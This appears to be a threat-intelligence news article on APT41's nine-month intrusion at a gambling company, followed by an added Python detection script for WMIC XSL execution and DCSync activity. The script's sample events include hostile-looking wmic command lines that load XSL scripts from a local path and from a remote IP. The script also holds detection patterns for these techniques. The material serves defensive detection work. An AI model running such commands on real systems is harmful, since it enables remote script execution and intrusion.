The APT41 group carried out a cyber attack on the gambling sector, operating covertly and adapting its tools in response to the defenders' security activity. The group, a cybercriminal collective also known as Brass Typhoon, Earth Baku, Wicked Panda, and Winnti, remained inside the networks of a client from that industry for almost nine months, collecting confidential data and evading security controls.
The Israeli company Security Joes, which took part in the incident investigation, said the attackers exfiltrated network configurations, user passwords, and data from the LSASS process. Company founder Ido Naor noted: "The hackers modified their tools based on the defenders' actions, maintaining access and changing strategy imperceptibly."
The methods used during the attack resembled those observed in Operation Crimson Palace, which Sophos is tracking. Naor also stressed that the malicious campaign probably had a financial motive, despite state backing.
APT41 used a complex set of tactics to circumvent protective measures and create hidden remote access channels. One of the attack methods was DCSync, the collection of password hashes to take over administrator accounts and expand access. Phantom DLL hijacking attacks and legitimate system utilities such as wmic.exe were also used.
Although the exact method of initial entry into the network remains unknown, phishing emails were probably used, since no vulnerabilities in external-facing applications or supply-chain exposure were found. After gaining entry, the attackers focused on administrator and developer accounts to maintain control over the infrastructure.
Security Joes revealed that the attackers temporarily halted their activity after being discovered but later returned with an updated approach. They used JavaScript code embedded in an XSL file to execute malicious commands through the WMIC utility.
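Two of the techniques described above, DCSync and WMIC-driven XSL script execution, both leave traces in standard Windows security telemetry. The following detection logic is an added example written for this article; it is not code from Security Joes or from any tool mentioned here. It runs over a handful of constructed sample events shaped like Windows event 4688 (process creation) and 4662 (directory object access) and flags two patterns: a `wmic.exe` command whose `/format:` argument points at a file path or URL rather than a built-in formatter, and a 4662 event in which a non-machine account requests one of the directory replication control-access rights that a DCSync-style request requires. The account names, command lines and host identifiers in the sample are invented; the three replication right GUIDs are the real Active Directory values.

```python
import re

# Constructed sample events (not from the article or from any real incident).
# Each dict mimics the fields a SIEM would expose for the two event types.
SAMPLE_EVENTS = [
    {"id": 4688, "user": "CORP\\svc-backup",
     "cmdline": r'wmic.exe os get /FORMAT:"C:\Users\Public\update.xsl"'},
    {"id": 4688, "user": "CORP\\helpdesk",
     "cmdline": r"wmic.exe process list brief"},            # benign built-in output
    {"id": 4688, "user": "CORP\\dev01",
     "cmdline": r"wmic.exe /node:srv01 os get /format:http://203.0.113.5/a.xsl"},
    {"id": 4662, "user": "CORP\\DC01$",                      # domain controller machine account
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "user": "CORP\\jdoe",                       # ordinary user requesting replication
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "user": "CORP\\jdoe",                       # unrelated object GUID, not replication
     "properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

# Control-access-right GUIDs needed for a DCSync-style replication request.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Capture the value given to /format:, quoted or bare.
WMIC_FORMAT_RE = re.compile(
    r'wmic(?:\.exe)?\b.*?/format:(?P<fmt>"[^"]*"|\S+)', re.IGNORECASE)
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


def is_machine_account(user: str) -> bool:
    """Computer accounts (including DCs) end in '$'; those replicate legitimately."""
    return user.rstrip().endswith("$")


def wmic_xsl_finding(event: dict):
    """Flag wmic /format: values that name a file or URL instead of a built-in formatter."""
    m = WMIC_FORMAT_RE.search(event.get("cmdline", ""))
    if not m:
        return None
    value = m.group("fmt").strip('"\'')
    looks_like_script = (".xsl" in value.lower() or "://" in value
                         or "\\" in value or "/" in value)
    if not looks_like_script:
        return None
    return {"rule": "wmic_xsl_execution", "user": event["user"], "detail": value}


def dcsync_finding(event: dict):
    """Flag replication-right requests (4662) coming from non-machine accounts."""
    requested = {g.lower() for g in GUID_RE.findall(event.get("properties", ""))}
    hits = sorted(REPLICATION_GUIDS[g] for g in requested if g in REPLICATION_GUIDS)
    if not hits or is_machine_account(event["user"]):
        return None
    return {"rule": "dcsync_replication_request", "user": event["user"],
            "detail": ", ".join(hits)}


def detect(events: list) -> list:
    """Run both rules over a list of events and return the findings in input order."""
    findings = []
    for ev in events:
        if ev.get("id") == 4688:
            f = wmic_xsl_finding(ev)
        elif ev.get("id") == 4662:
            f = dcsync_finding(ev)
        else:
            f = None
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['rule']:28} {f['user']:18} {f['detail']}")
```

Two choices matter here. First, the WMIC rule keys on the shape of the `/format:` value rather than on the presence of the switch, because `/format:csv` and similar built-in formatters are common in administrative scripts and would otherwise drown the alert. Second, the DCSync rule excludes machine accounts by name suffix only as a first cut; in a real deployment the allow-list should be the actual set of domain controller and AD-connected service accounts, since an attacker who has obtained a machine account's credentials would slip past a suffix check.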
A distinctive feature of the campaign was the filtering of infected devices by IP addresses containing the string "10.20.22", which indicates targeted use of the VPN network ranges. This approach allowed the attackers to affect only the devices that interested them.